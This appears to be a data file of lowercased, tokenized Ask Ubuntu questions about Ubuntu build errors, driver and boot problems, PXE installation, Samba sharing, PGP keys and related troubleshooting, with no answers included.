318233	aircrack-ng-cuda on ubuntu 12.04 lts help ... ?	hey guys im trying to build cuda support for my aircrack suit but im gettin the following errors ... sf49 @ sf49 : ~/aircrack-ng-cuda $ make cuda=true sqlite=true unstable=true install make -c src install make [ 1 ] : entering directory `/home/sf49/aircrack-ng-cuda/src' make -c osdep make [ 2 ] : entering directory `/home/sf49/aircrack-ng-cuda/src/osdep' building for linux make [ 3 ] : entering directory `/home/sf49/aircrack-ng-cuda/src/osdep' gcc -g -w -wall -o3 -d_file_offset_bits=64 -d_revision=2312 -i/usr/local/include -dhave_sqlite -fpic -i.. -c -o osdep.o osdep.c gcc -g -w -wall -o3 -d_file_offset_bits=64 -d_revision=2312 -i/usr/local/include -dhave_sqlite -fpic -i.. -c -o network.o network.c network.c : in function ‘net_read’ : network.c:305 : warning : dereferencing type-punned pointer will break strict-aliasing rules network.c : in function ‘net_get_mac’ : network.c:353 : warning : dereferencing type-punned pointer will break strict-aliasing rules gcc -g -w -wall -o3 -d_file_offset_bits=64 -d_revision=2312 -i/usr/local/include -dhave_sqlite -fpic -i.. -c -o linux.o linux.c gcc -g -w -wall -o3 -d_file_offset_bits=64 -d_revision=2312 -i/usr/local/include -dhave_sqlite -fpic -i.. -c -o linux_tap.o linux_tap.c gcc -g -w -wall -o3 -d_file_offset_bits=64 -d_revision=2312 -i/usr/local/include -dhave_sqlite -fpic -i.. -c -o radiotap-parser.o radiotap-parser.c gcc -g -w -wall -o3 -d_file_offset_bits=64 -d_revision=2312 -i/usr/local/include -dhave_sqlite -fpic -i.. -c -o common.o common.c ar cru libosdep.a osdep.o network.o linux.o linux_tap.o radiotap-parser.o common.o ranlib libosdep.a touch .os.linux make [ 3 ] : leaving directory `/home/sf49/aircrack-ng-cuda/src/osdep' make [ 2 ] : leaving directory `/home/sf49/aircrack-ng-cuda/src/osdep' gcc -g -w -wall -o3 -d_file_offset_bits=64 -d_revision=2312 -i/usr/local/include -dhave_sqlite -iinclude -dcuda_enabled -c -o aircrack-ng.o aircrack-ng.c gcc -g -w -wall -o3 -d_file_offset_bits=64 -d_revision=2312 -i/usr/local/include -dhave_sqlite -iinclude -dcuda_enabled -c -o crypto.o crypto.c gcc -g -w -wall -o3 -d_file_offset_bits=64 -d_revision=2312 -i/usr/local/include -dhave_sqlite -iinclude -dcuda_enabled -c -o common.o common.c gcc -g -w -wall -o3 -d_file_offset_bits=64 -d_revision=2312 -i/usr/local/include -dhave_sqlite -iinclude -dcuda_enabled -c -o uniqueiv.o uniqueiv.c gcc -g -w -wall -o3 -d_file_offset_bits=64 -d_revision=2312 -i/usr/local/include -dhave_sqlite -iinclude -dcuda_enabled -c -o aircrack-ptw-lib.o aircrack-ptw-lib.c /bin/nvcc -- compiler-options -fno-strict-aliasing -- host-compilation=c -i . -i/include -dunix -maxrregcount 12 -o cudacrypto.o -c cudacrypto.cu make [ 1 ] : /bin/nvcc : command not found make [ 1 ] : *** [ cudacrypto.o ] error 127 make [ 1 ] : leaving directory `/home/sf49/aircrack-ng-cuda/src' make : *** [ install ] error 2 if anyone can help please all answeres are greatly appreciated !
318235	xps 13 without ubuntu . can i take it to an oem state ?	i 'm considering buying a refurbished xps 13 . the problem is that it does n't come with ubuntu pre-installed . can i get it to a point where is similar to the oem version ?
318236	openvpn - password authentication only	when using the openvpn client for windows , i can log into the openvpn server with only a username and password . i ca n't figure out how to make the same thing happen in ubuntu . it seems that some kind of cert is required . any idea how authenticate with an openvpn server with only a username and password ?
318243	development desktop in ubuntu 12.04	how do i create programs for ubuntu , with the same ease that i have with visual studio express on windows ?
318244	how do i decrease the font size on the default unity theme ?	how do i decrease the overall general system font size on the default unity theme ? i just want fonts to generally be one notch smaller .
318245	java noclassdeffounderror trying to run tinyviz on tinyos ubuntu	i have a problem with tinyviz , which is a java simulator . when i run it with the command tinyviz , i get this message on my screen : java -dpython.cachedir=/tmp/jython.cache -ddbg= -dsimdbg= net.tinyos.sim.simdriver -gui starting simdriver ... simulation random seed 1486964521 initializing simulator objects ... exception in thread `` main '' java.lang.noclassdeffounderror : net/tinyos/packet/platform at net.tinyos.message.messagefactory.instantiatetosmsg ( messagefactory.java:122 ) at net.tinyos.message.messagefactory.createtosmsg ( messagefactory.java:44 ) at net.tinyos.sim.simcommands . ( simcommands.java:64 ) at net.tinyos.sim.simdriver . ( simdriver.java:244 ) at net.tinyos.sim.simdriver.main ( simdriver.java:539 ) caused by : java.lang.classnotfoundexception : net.tinyos.packet.platform at java.net.urlclassloader $ 1.run ( urlclassloader.java:366 ) at java.net.urlclassloader $ 1.run ( urlclassloader.java:355 ) at java.security.accesscontroller.doprivileged ( native method ) at java.net.urlclassloader.findclass ( urlclassloader.java:354 ) at java.lang.classloader.loadclass ( classloader.java:423 ) at sun.misc.launcher $ appclassloader.loadclass ( launcher.java:308 ) at java.lang.classloader.loadclass ( classloader.java:356 ) ... 5 more
318246	complete installation guide for android sdk / adt bundle on ubuntu	what all needs to be done to install android sdk / adt bundle on ubuntu ? each of the steps in the answer was found on some different forum as i encountered obstacles getting started with my android sdk and posted questions in appropriate forums thereafter . so i thought this would be useful in that it is a one stop solution available , in case one ever needs to re-install ubuntu and install the android sdk / adt bundle from scratch !
318250	how do i set sound output to mono ?	because i live in a house with other people , i need to listen to music with headphones on . however , the left earphone unexpectedly stopped working ( whilst the right still works perfectly ) . how do i set the output to mono so that i can properly listen to music ? edit : i know only the right earphone will work , but i still only hear part of the music ( the part that would have normally gone only to the left earphone does n't go to the right , even if the left is broken ) .
318252	usb headset not working on skype on xubuntu	i 've experienced some issues using skype on xubuntu . when trying to make/ receive calls , i 've noticed that there is no audio , and i 'm not entirely sure if my mic is working either . the headset is 100 % working on other operating systems ( both windows 7 and osx ) . the headset is a gamecom 780 usb . when attempting to change the input and output , there are no other options other than `` pulseaudio server ( local ) '' . this is on all three ; microphone , speakers and ringing . any help is appreciated . thanks
318253	how do i customize unity on ubuntu 13.04 ?	i have been searching some themes for unity on ubuntu 13.04 , the simplest way to install themes that i use is copying the theme into /usr/share/themes , this worked but just for a few themes , but not to this the union blue theme . i really be grateful if someone can explain me how to transform my unity into this . it would be really nice if a brave man explain this in the most detailed way and it would be even better if you explain how to change the panel like in the image . thanks .
318266	error during apt-mirror unattended install of ubuntu server 12.04 over network using pxe	i 'm attempting to pxe boot and completely rebuild a new server with an `` ubuntu 12.04 server '' image over the network using apt-mirror but i get multiple errors mid-way through the installation . i am able to successfully rebuild the same server with a physical cdrom ( created using the very same files from the `` ubuntu-12.04.2-server-amd64.iso '' image ) without issue , yet i have issues building over the network as it provides the following error messages just after it partitions the discs and begins the last big file transfer . as a result , i have not been able to get a successful server pxe built using my business ' internal network ( using the external repository works ) . error 1 : ! ! install the base system debootstrap warning warning : could n't download package eject ( ver 2.1.5+deb1+cvs20081104-9 arc amd64 ) error 2 : ! ! install the base system debootstrap warning warning : could n't download package liblzma5 ( ver 5.1.1alpha+20110809-3 arc amd64 ) error 3 : ! ! install the base system debootstrap warning warning : could n't download package libstdc++6 ( ver 4.6.3-1ubuntu5 arc amd64 ) more similar errors appear but have been omitted for brevity ... here 's the last portion of the /var/log/syslog : ... jul 12 17:30:00 partman-lvm : logical volume `` swap_1 '' successfully removed jul 12 17:30:00 udevd [ 24071 ] : inotify_add_watch ( 6 , /dev/dm-1 , 10 ) failed : no such file or directory jul 12 17:30:00 partman-lvm : 0 logical volume ( s ) in volume group `` coolservername '' now active jul 12 17:30:00 partman-lvm : volume group `` coolservername '' successfully removed jul 12 17:30:00 partman-lvm : labels on physical volume `` /dev/sda3 '' successfully wiped jul 12 17:30:02 partman-lvm : physical volume `` /dev/sda3 '' successfully created jul 12 17:30:02 partman-lvm : volume group `` coolservername '' successfully created jul 12 17:30:02 partman-lvm : logical volume `` root '' created jul 12 17:30:02 partman-lvm : logical volume `` swap_1 '' created jul 12 17:30:06 kernel : [ 184.508873 ] adding 16695292k swap on /dev/mapper/coolservername-swap_1 . priority : -1 extents:1 across:16695292k jul 12 17:30:07 partman : mke2fs 1.42 ( 29-nov-2011 ) jul 12 17:30:21 kernel : [ 199.286079 ] ext4-fs ( dm-0 ) : mounted filesystem with ordered data mode . opts : errors=remount-ro jul 12 17:30:22 apt-install : queueing package e2fsprogs for later installation jul 12 17:30:22 main-menu [ 514 ] : ( process:25003 ) : /var/lib/partman/devices/=dev=sda jul 12 17:30:23 main-menu [ 514 ] : debug : resolver ( libnewt0.52 ) : package does n't exist ( ignored ) jul 12 17:30:23 main-menu [ 514 ] : debug : resolver ( ext2-modules ) : package does n't exist ( ignored ) jul 12 17:30:23 main-menu [ 514 ] : info : menu item 'bootstrap-base ' selected jul 12 17:30:23 debconf-copydb : can not open question file /target/var/cache/debconf/config.dat : no such file or directory jul 12 17:30:23 debconf-copydb : can not open template file /target/var/cache/debconf/templates.dat : no such file or directory jul 12 17:30:23 base-installer : chroot : ca n't execute 'debconf-set-selections ' : no such file or directory jul 12 17:30:23 base-installer : warning : /usr/lib/base-installer.d/20console-setup returned error code 127 jul 12 17:30:55 base-installer : error : exiting on error base-installer/debootstrap-failed jul 12 17:30:55 main-menu [ 514 ] : warning ** : configuring 'bootstrap-base ' failed with error code 1 jul 12 17:30:55 main-menu [ 514 ] : warning ** : menu item 'bootstrap-base ' failed . jul 12 17:30:56 main-menu [ 514 ] : info : modifying debconf priority limit from 'high ' to 'medium' jul 12 17:30:56 debconf : setting debconf/priority to medium jul 12 17:30:57 main-menu [ 514 ] : debug : resolver ( libnewt0.52 ) : package does n't exist ( ignored ) jul 12 17:30:57 main-menu [ 514 ] : debug : resolver ( ext2-modules ) : package does n't exist ( ignored ) jul 12 17:30:59 main-menu [ 514 ] : info : menu item 'save-logs ' selected i first implemented a dhcp/tftp solution using pxelinux ( https : //help.ubuntu.com/community/pxeinstallserver ) but have since moved to gpxelinux with syslinux to try to get this to work ( plus it appears that the use of http is faster than tftp etc. ) . still with no success i attempted to use a simple kickstart file : install url -- url http : //10.16.25.80:4040/ubuntu/repository/ ... along with a complete apt-mirror repository ( as suggested here - > unable to install 12.10 with pxe ) with no improvement . i also tried using the `` ubuntu-12.04.2-alternate-amd64.iso '' image as well . server hardware ( the one i 'm attempting to reimage ) dell poweredge r320 4 physical hard drives configured as hardware raid 0 with one 4tb virtual drive . 16gb ram about the host server ( server used to build ) the hosting server is of similar hardware and was previously configured with ubuntu server 12.04 ( precise ) with chef server 10.18.2 using the web-ui which uses merb for web services ( http ) . this server acts as the dhcp/http/tftp/apt-mirror host . installed dhcp sudo apt-get install isc-dhcp-server /etc/default/isc-dhcp-server interfaces= '' eth0 '' /etc/dhcp/dhcpd.conf ddns-update-style none ; option domain-name `` corp.com '' ; option domain-name-servers dns1.corp.com , dns2.corp.com ; default-lease-time 600 ; max-lease-time 7200 ; log-facility local7 ; subnet 10.16.25.0 netmask 255.255.255.0 { range 10.16.25.195 10.16.25.199 ; option domain-name `` corp.com '' ; option domain-name-servers 10.10.10.200 , 10.10.10.201 ; option routers 10.16.25.1 ; option broadcast-address 10.16.25.254 ; option ntp-servers 10.10.10.203 ; default-lease-time 600 ; max-lease-time 7200 ; filename `` gpxelinux.0 '' ; } installed tftp sudo apt-get install tftpd-hpa /etc/default/tftpd-hpa run_daemon=âyesâ tftp_username= '' tftp '' tftp_directory= '' /var/lib/tftpboot '' tftp_address= '' 0.0.0.0:69 '' tftp_options= '' -- secure '' installed syslinux sudo apt-get install syslinux /var/lib/tftpboot/pxelinux.cfg/default ... label server ( preseed/http ) kernel http : //10.16.25.80:4040/pxe/ubuntu/12.04/alternate-amd64/install/netboot/ubuntu-installer/amd64/linux append auto=true interface=eth0 hostname=coolservername url=http : //10.16.25.80:4040/pxe/preseed/coolservername.seed initrd=http : //10.16.25.80:4040/pxe/ubuntu/12.04/alternate-amd64/install/netboot/ubuntu-installer/amd64/initrd.gz -- configured a preseed file the seed file is located at http : //10.16.25.80:4040/pxe/preseed/coolservername.seed # language : d-i debian-installer/language string en # country : d-i debian-installer/country string us # detect keyboard layout ? d-i console-setup/ask_detect boolean false # country of origin for the keyboard : d-i keyboard-configuration/layout select english ( us ) # keyboard layout : d-i keyboard-configuration/variant select english ( us ) # domain name : d-i netcfg/get_domain string corp.com # disable that annoying wep key dialog . d-i netcfg/wireless_wep string # configure the application repository mirror d-i mirror/protocol string http d-i mirror/country string manual d-i mirror/http/hostname string 10.16.25.80:4040 d-i mirror/http/directory string /pxe/ubuntu/repository/ # d-i mirror/http/directory string /pxe/ubuntu/12.04/server-amd64/ # d-i mirror/http/directory string /pxe/ubuntu/12.04/alternate-amd64/ d-i mirror/http/proxy string d-i mirror/suite string precise # create a normal user account d-i passwd/user-fullname string a really cool default user d-i passwd/username string coolusername # normal user 's encrypted password ( using an md5 hash ) d-i passwd/user-password-crypted password 12345678901234567890123456789012 # set to true to encrypt the first user 's home directory d-i user-setup/encrypt-home boolean false # only ask the utc question if there are other operating systems installed . d-i clock-setup/utc-auto boolean true # controls whether or not the hardware clock is set to utc d-i clock-setup/utc boolean true # time zone setup d-i time/zone string us/pacific # configure disk storage and partitions d-i partman-auto/method string lvm # if one of the disks that are going to be automatically partitioned # contains an old lvm configuration , the user will normally receive a # warning . this can be preseeded away ... d-i partman-lvm/device_remove_lvm boolean true # the same applies to pre-existing software raid array : d-i partman-md/device_remove_md boolean true # and the same goes for the confirmation to write the lvm partitions . d-i partman-lvm/confirm boolean true # for lvm partitioning , you can select how much of the volume group to use # for logical volumes . d-i partman-auto-lvm/guided_size string max # you can choose one of the three predefined partitioning recipes : # - atomic : all files in one partition # - home : separate /home partition # - multi : separate /home , /usr , /var , and /tmp partitions d-i partman-auto/choose_recipe select atomic # this makes partman automatically partition without confirmation , provided # that you told it what to do using one of the methods above . d-i partman-partitioning/confirm_write_new_label boolean true d-i partman/choose_partition select finish d-i partman/confirm boolean true d-i partman/confirm_nooverwrite boolean true # by default the installer requires that repositories be authenticated # using a known gpg key . this setting can be used to disable that # authentication . warning : insecure , not recommended . d-i debian-installer/allow_unauthenticated boolean true # package selection - run this grep ( from existing ) to see list of available options # `` grep task /usr/share/tasksel/ubuntu-tasks.desc '' tasksel tasksel/first multiselect server , standard # individual additional packages to install d-i pkgsel/include string openssh-server # whether to upgrade packages after debootstrap . # allowed values : none , safe-upgrade , full-upgrade d-i pkgsel/upgrade select full-upgrade # policy for applying updates . may be `` none '' ( no automatic updates ) , # `` unattended-upgrades '' ( install security updates automatically ) , or # `` landscape '' ( manage system with landscape ) . d-i pkgsel/update-policy select none # by default , the system 's locate database will be updated after the # installer has finished installing most packages . this may take a while , so # if you do n't want it , you can set this to `` false '' to turn it off . d-i pkgsel/updatedb boolean true # only install basic language packs . let tasksel ask about tasks . d-i pkgsel/language-pack-patterns string # no language support packages . d-i pkgsel/install-language-support boolean false # verbose output and no boot splash screen . d-i debian-installer/quiet boolean false d-i debian-installer/splash boolean false # this is fairly safe to set , it makes grub install automatically to the mbr # if no other operating system is detected on the machine . d-i grub-installer/only_debian boolean true # this one makes grub-installer install to the mbr if it also finds some other # os , which is less safe as it might not be able to boot that other os . d-i grub-installer/with_other_os boolean true # wait for two seconds in grub d-i grub-installer/timeout string 2 # this will prevent the installer from ejecting the cd during the reboot . d-i cdrom-detect/eject boolean false # avoid that last message about the install being complete . d-i finish-install/reboot_in_progress note # overwrite the server 's network configuration file ( /etc/network/interfaces ) d-i preseed/run string coolservername.sh installed apt-mirror sudo apt-get install apt-mirror /etc/apt/mirror.list set nthreads 20 set _tilde 0 deb http : //us.archive.ubuntu.com/ubuntu precise main main/debian-installer restricted restricted/debian-installer universe universe/debian-installer multiverse multiverse/debian-installer deb-amd64 http : //us.archive.ubuntu.com/ubuntu precise main main/debian-installer restricted restricted/debian-installer universe universe/debian-installer multiverse multiverse/debian-installer deb-i386 http : //us.archive.ubuntu.com/ubuntu precise main main/debian-installer restricted restricted/debian-installer universe universe/debian-installer multiverse multiverse/debian-installer deb http : //us.archive.ubuntu.com/ubuntu precise-security main restricted universe multiverse deb http : //us.archive.ubuntu.com/ubuntu precise-updates main restricted universe multiverse clean http : //archive.ubuntu.com/ubuntu http : //10.16.25.80:4040/pxe/ubuntu/repository is a symbolic link to the mirrored files at `` /var/spool/apt-mirror/mirror/us.archive.ubuntu.com/ubuntu/ '' . any assistance would be greatly appreciated on getting past these errors and successfully helping the reimaging/rebuilding of this server as i 've spent much time investigating and searching with no luck ... many thanks in advance ! !
318271	grub-install dummy failed	while it is installing ( any version of ubuntu ) it pops up with a message saying : grub-install dummy failed . this is a fatal error . i have windows 8 already installed on my computer which is a hp envy dv7 . i have not installed ubuntu yet , because i ca n't . any idea on what to do ?
318277	ubuntu not booting from usb drive	i have an acer aspire one netbook and i want to check ubuntu by trying it from the usb . i downloaded 12.04 desktop and the universal usb installer . i restarted the computer , pressed f2 , and moved the usb option up the list so it boots from there , but it 's not working . i removed u3 from my flash drive . i also tried downloading lili . all i get , every time , is a copyright message for intel over a black background . i have tried erasing the usb and installing it again and again ... i do n't know what to do . could someone please help me ? thanks .
318281	how can i find out if all my hard drives are mounted ( ubuntu server ) ?	i had one hard disk to start with . on that hard disk i installed ubuntu server . today i added 2 other hard drives to the system . but i am not sure if the server software mounts the disks . how can i find that out ? edit : i found the drives with sudo fdisk -l. now i think i can access/mount the drives . thanks .
318284	moonlight/silverlight - is it still working	i know that this question ( how open silverlight/moonlight web pages in ubuntu ? ) has been asked million of times , but it seems that no one of this solutions works for me . even if i added legacy repositories , i 'm still unable to install moonlight plugin for firefox . is there any way to resolve it or do i need to abandon ubuntu and install open suse ( which is natively supported by novell moonlight ) ?
318286	unable to access limited access folder from windows 7 pc	i am a complete novice at ubuntu and linux systems in general . i have wanted to play around with the os for years and finally set up a spare computer and installed ubuntu 12.04.2 . my goal is to make this machine a simple file sharing pc for my family to share all the music/videos/pictures on one machine . i have installed samba with samba server configuration . i successfully shared the photo/music/video folders on the ubuntu pc and can access it on the windows pc 's in the house . when i set up the share options , i set access to everyone and everyone can get get access to them . no problem , so far so good . i created a storage folder to backup some important documents and files that i do n't want the kids to have access too . when i set it up with everyone access , i can get to the folder on my windows 7 pc with no problems . when i set it up with specific users , i get prompted by windows to enter user name and password ; and when i enter the correct credentials , i get an error . how can i put password protection on the shared folder so only i can get access ?
318293	find out the location of where a process was executed	i have a number of ruby processes running : ps -a | grep ruby 3518 ? 00:00:12 ruby 10316 ? 00:00:00 ruby 22400 pts/5 00:00:45 ruby 23332 ? 00:00:07 ruby i get the pid above , but i want to know where these processes are in the filesystem . in other words , where they were executed . why do i want to know ? i have a daemon running in a byobu screen and i want to know where it was executed from . byobu new -s daemon ls -l -rwxrwxr-x 1 someuser someuser 83 jul 2 11:13 db_service.sh cat db_service.sh # ! /bin/sh rails_env=production bundle exec ruby lib/daemons/db_service_ctl start ./script/db_service.sh so as you can see from the above bash commands , a daemon was spawned ( ruby on rails daemon ) from the db_service.sh shell script . so where in the filesystem was it spawned from ? can ps help me here or is there a better program in linux to find out the desired information ? i am not looking for the path of the ruby installation , but rather the path at which a ruby instance was executed
318298	ubuntu as miracast sender/receiver	could n't find anything about ubuntu act as a miracast receiver or sender . general info about miracast at wikipedia should this work ? supported hw ? ( wifi direct ? ) only via wifi no lan ? if wifi direct works should miracast just work too ? i plan to use it together with an android phone ( 4.x jelly bean ) only hint i found at brainstorm.ubuntu.com/idea/30810 seems dead ( well the brainstorm redirect me to the ubuntu community page . see my other questions :
318309	virtual box error	i 'm trying to install windows 7 on the virtualbox when it trys to start up it will stop and say status : 0xc0000225 and wont open windows . i have tried several different .iso files of windows .
318310	unable to install drivers after updating linux kernel 3.10	after updating to linux 3.10 my gpu stopped working , it is a evga nvidia geforce 650 . so i went about to purge nvidia and reinstall , did not work . the first time i installed it worked the flawlessly . this is what happens , when i go to `` additional drivers '' > activate > nvidia binary xorgdriver , kernal , module and vdpau library , i get the following error : sorry installation of this driver failed . please have a look at the log file for details : /var/log/jockey.log` . so i did the troubleshoot for that and still did not work . then , i went to the nvidia x server settings and got this error : you do not appear to be using the nvidia x driver . please edit your x configuration file ( just run 'nvidia-xconfi ' as root ) ` i did that and i get the usual new x config file written to 'etc/x11/xorg.conf . that still does not work . i purged nvidia again . i downloaded it again via nvidia 's website and booted to cmd to do a manual install , but when it wo n't boot to cmd it is just a black screen and nothing shows up . i am new to ubuntu so please go easy on me , i have a bunch of cs projects i have to finish for school so time is of the essence . ( i do n't know if this will help but i had issues installing jdk , it still does not compile correctly as well as rsa and ssh and git . so i do n't know if i screwed up big time on the kernel update ) .
318312	random corrupt images	ever since i switched over to xubuntu 13.04 when browsing the web random images will appear corrupt . i attempted everything from clearing firefox ( cache , history , cookies etc ) to a full blow re-install ( i even double checked the md5 ) . i run a dual boot on this machine and have no troubles with this in windows , nor do any other computers on the network so it 's not a connection issue . i also tested the hdd for bad sectors and ran a memory test both came up clear . i 've never had this issue with any other distro previous ( i 've been using xubuntu since 8.04 , and debian/redhat for longer ) the system has all the updates installed . i 've uploaded some screencaps of what it appears like here
318315	how can i temporarily disable aslr ( address space layout randomization ) ?	i am using ubuntu 12.04 32-bits now for some experiment i need to disable aslr how can i do this ? and after that what should i do to enable aslr again ?
318316	unity will not load , ccsm settings do n't stick	when i log in , the only thing i get is a desktop background , but no unity elements . i can access a terminal , but that appears to be it . i saw another thread here going on about re-enabling the unity plugin with ccsm , but that has n't worked . every time i enable unity within ccsm and reboot , it comes back with the unity plugin disabled . i am completely at a loss for what to do . any ideas ?
318325	quodlibet could n't connect to a device backend	i 'm new to quod libet but i want to like it . every other music app has disappointed me in some way and so far ql disappoints me least . it 's not perfect but i 'm trying very hard to make it work . however , i ca n't get my devices to be recognized properly . i have an ancient ipod mini and an htc one x. i was previously using ubuntu 12.04 and quod libet 2.3.2 and i could get the ipod to work fine but the htc was giving me trouble , mostly because of mtp issues , i presume . in the hope that upgrading my os would help , i 'm now at ubuntu 13.04 . however , the media devices browser wo n't even load now . this is what i see when i open quodlibet from command line : w : initializing device backend . w : could n't connect to a device backend . w : no device backend , media devices browser disabled . the default ubuntu 13.04 version is still 2.4 , so i tried the quodlibet stable repo ( ppa : lazka/ppa ) and got 2.5.1 , which gave me the same error . i 'm now using the unstable repo ( ppa : lazka/dumpingplace ) with version 3.0.1 but still getting the same error . what might i be doing wrong ? i 've looked around online and i ca n't find hardly anything relevant . one person recommended making sure udisks2 was present , but i appear to have that installed . that 's about all i 've found . these are my other current related versions , in case it helps : audio device : gstreamer ( autoaudiosink ) mutagen : 1.21.-1 gtk+ : 3.6.4 pygobject : 3.8.0 gstreamer : 1.0.6.0 thanks !
318326	what is canonical 's lts support policy for eol software ?	i 'm using php 5.3 and need to remain on php 5.3 for the foreseeable future . please do n't suggest upgrading -- for my setup , it 's simply not possible at this stage . i 'm currently evaluating which os to choose for my new server . i 'd prefer to use debian wheezy ( on which i 'd leverage apt 's pinning system to pull php 5.3 packages from squeeze ) , but the latest ubuntu lts includes php 5.3 and is supported until 2017 . here 's what i 'm wondering : php 5.3 goes eol in less than a year . when it 's abandoned , will canonical abandon it as well , or will they backport security fixes from php 5.4+ ( where applicable ) until 2017 ?
318327	ubuntu 13.04 installation issues : unable to handle kernel paging request error	i wish i could say that i’ve done more for the linux community as of recent but i am very very new to all of this and i feel very much in over my head . i figured i would install ubuntu . on my computer and then i would learn and contribute to the community simultaneously . i will try to be as detailed as i can , please ask questions if you need clarification . i installed ubuntu . 13.04 ( 64-bit ) on my dell inspiron 1501 . this has an amd turion 64-bit tl-56 1.8 ghz mobile processor . it is a dual core . it has an ati radeon xpress 1150 chipset in it as well . as of right now i only have a total of 2ghz ram , however i was planning on upgrading that in the near future so i opted for the 64-bit ubuntu . 13.04 . i first tried the live cd and everything seemed to be functioning correctly other than the wireless ( but that 's not the issue at hand , there are plenty of guides on the internet on how to get that functioning ) . the internet worked just fine when it was plugged in so no issues there . however , once i went from that to installing 13.04 ( just 13.04 , no dual partitioning ... i want this computer to run strictly ubuntu . ) it did not work . it took me into a shell that i could not type anything into . in this shell it said bug : unable to handle kernel paging and then it called a bunch of traces and froze up . i had to hard reset the laptop . i tried the boot-repair program multiple times with many different settings and typically after starting up the laptop would say something along the lines of recursive errors . will attempt to fix and then it would attempt to fix a couple of things , and then the computer would freeze up after the text said end trace ... so i had to hard reset it again . i 'm not an impatient person either , when i say it would freeze up it would be for a period of at least 15 minutes each time before i decided to hard reset . i attempted to install 12.10 on it instead and i got the same exact message , and when i ran boot-repair it did the same exact thing as before . i am currently in the process of running memtest64+ on the computer 's memory , though i really do n't believe that , nor any of the hardware is at fault due to the fact that it was still running windows vista perfectly when i had decided to switch over to ubuntu . so far the memtest has came back just fine without any errors , but i’ve only been running it for approximately an hour . so this is the situation i’m in . i did notice when i was using the live disk that the video driver needed updated so i performed that , though i’m fairly certain that has nothing to do with this . i have also attempted ( though i’m not certain that my attempt was successful in accomplishing what i had planned ) to manually edit the grub settings by making acpi=0 along top of adding nomodeset to the boot commands . like i said , i’m not sure i did that correctly though , but i’m fairly certain i did . if anyone needs any more information i will be more than happy to provide it , i will post back once i get the full results of the memtest . i very much appreciate any ideas anyone else has , i’ve been at this for a few days to no avail ... thank you
318347	unable to open software-center in ubuntu 13.04	when i click on ubuntu software center it does nothing . would you please help to get it working ? also i tried update & upgrade , but no use . i tried it via terminal using software-center then it gives this error . abdul @ abdul-lenovo-g580 : ~/git/flex-voicemail/voicemail $ software-center 2013-07-10 08:44:15,044 - softwarecenter.ui.gtk3.app - info - setting up proxy 'none' 2013-07-10 08:44:15,088 - softwarecenter.fixme - warning - logs to the root logger : ' ( '/usr/lib/python2.7/dist-packages/dbus/proxies.py ' , 410 , '_introspect_error_handler ' ) ' 2013-07-10 08:44:15,088 - dbus.proxies - error - introspect error on com.ubuntu.sso : /com/ubuntu/sso/credentials : dbus.exceptions.dbusexception : org.freedesktop.dbus.error.spawn.childexited : process /usr/lib/ubuntu-sso-client/ubuntu- sso-login exited with status 1 traceback ( most recent call last ) : file `` /usr/bin/software-center '' , line 130 , in < module > app = softwarecenterappgtk3 ( options , args ) file `` /usr/share/software-center/softwarecenter/ui/gtk3/app.py '' , line 338 , in __init__ self.icons ) file `` /usr/share/software-center/softwarecenter/ui/gtk3/session/appmanager.py '' , line 66 , in __init__ self.oauth_token = helper.find_oauth_token_sync ( ) file `` /usr/share/software-center/softwarecenter/backend/ubuntusso.py '' , line 141 , in find_oauth_token_sync sso.find_credentials ( ) file `` /usr/share/software-center/softwarecenter/backend/login_impl/login_sso.py '' , line 75 , in find_credentials self.proxy.find_credentials ( self.appname , self._get_params ( ) ) file `` /usr/lib/python2.7/dist-packages/dbus/proxies.py '' , line 70 , in __call__ return self._proxy_method ( *args , **keywords ) file `` /usr/lib/python2.7/dist-packages/dbus/proxies.py '' , line 145 , in __call__ **keywords ) file `` /usr/lib/python2.7/dist-packages/dbus/connection.py '' , line 651 , in call_blocking message , timeout ) dbus.exceptions.dbusexception : org.freedesktop.dbus.error.spawn.childexited : process /usr/lib/ubuntu-sso-client/ubuntu-sso-login exited with status 1
318355	chinese letters are not correct in jfreechart ( ubuntu 11.04 )	i am using jfreechart in my web application . french , german languages are rendered without any issue . but when i use chinese and japanese locale the languages are rendered as square box . at the same time in windows machine it works perfectly . i ca n't able to solve this issue . so please guide me .
318360	pgp key : length , multiple identities , smart card	i am new to gnupg . i have generated a key in with enigmail in thunderbird so far , which is also available through seahorse now . i generated a key with 2048bit . however , i read that 4096 is now recommended for some purposes . since my key is not distributed yet , i can generated a new one at any time . should i generate one with 4096bit ? are there any disadvantages ? incompatibilities ? i noticed that i can add multiple email-addresses to one key . is this advised ? i assume this might be a privacy problem if i do not want to have my business and private email-addresses linked . i have a smartcard which has a signature subkey , encryption subkey , authentication subkey . what is a subkey ? how does the smartcard interact with gnupg ? is there a key pre-installed on the card ? how can i be sure that this key exists only once ? can i derive a key from the card so that i can read my emails also on computers where i do not have a card reader ? what happens if the card breaks/gets lost ? can i make a backup of the keys on the card ? can i use my pgp-key to encrypt my home directory ? would this make sense ? thanks !
318361	why there is no `` sharing options '' on cinnamon on ubuntu 12.04 ?	i 've installed latest cinnamon on ubuntu 12.04 , everything is perfect , except sharing files and folders . when i 'm trying to share any files/folders by right-clicking the files/folders , surprisingly there is no `` sharing options '' field on the menu . why it 's not there ? how can get that option back ?
318364	sudoku does n't work , probable sys.path error	as the title suggests , the default sudoku game does n't work anymore . i used to use it quite frequently however , after a break when i tried to run it again , it does n't open . if i search for sudoku on the dash and click on it , the command is registered , but nothing happens . i 'm on 12.04 . how can this be fixed ? edit upon trying to run it in the terminal as gnome-sudoku or gnome-sudoku -v , i get the following error- traceback ( most recent call last ) : file `` /usr/games/gnome-sudoku '' , line 21 , in < module > from gnome_sudoku.gnome_sudoku import start_game importerror : no module named gnome_sudoku.gnome_sudoku edit # 2 paste bin links for - 1 ) locate gnome_sudoku http : //paste.ubuntu.com/5864729/ 2 ) python -c `` import sys ; print sys.path '' http : //paste.ubuntu.com/5864604/ 3 ) grep -n `` '' /usr/games/gnome-sudoku http : //paste.ubuntu.com/5864607/ edit # 3 as lgarzo suggested , /usr/lib/python2.7/dist-packages may be missing from my sys.path , and the output for python -c 'import os ; print os.environ [ `` pythonpath '' ] ' is traceback ( most recent call last ) : file `` < string > '' , line 1 , in < module > file `` /usr/local/lib/python2.7/userdict.py '' , line 23 , in __getitem__ raise keyerror ( key ) keyerror : 'pythonpath' and upon running pythonpath=/usr/lib/python2.7/dist-packages gnome-sudoku in the terminal i get - importerror : /usr/lib/python2.7/dist-packages/gi/_gi.so : undefined symbol : pyunicodeucs4_asutf8string my python version is 2.7.4 , how can one proceed ?
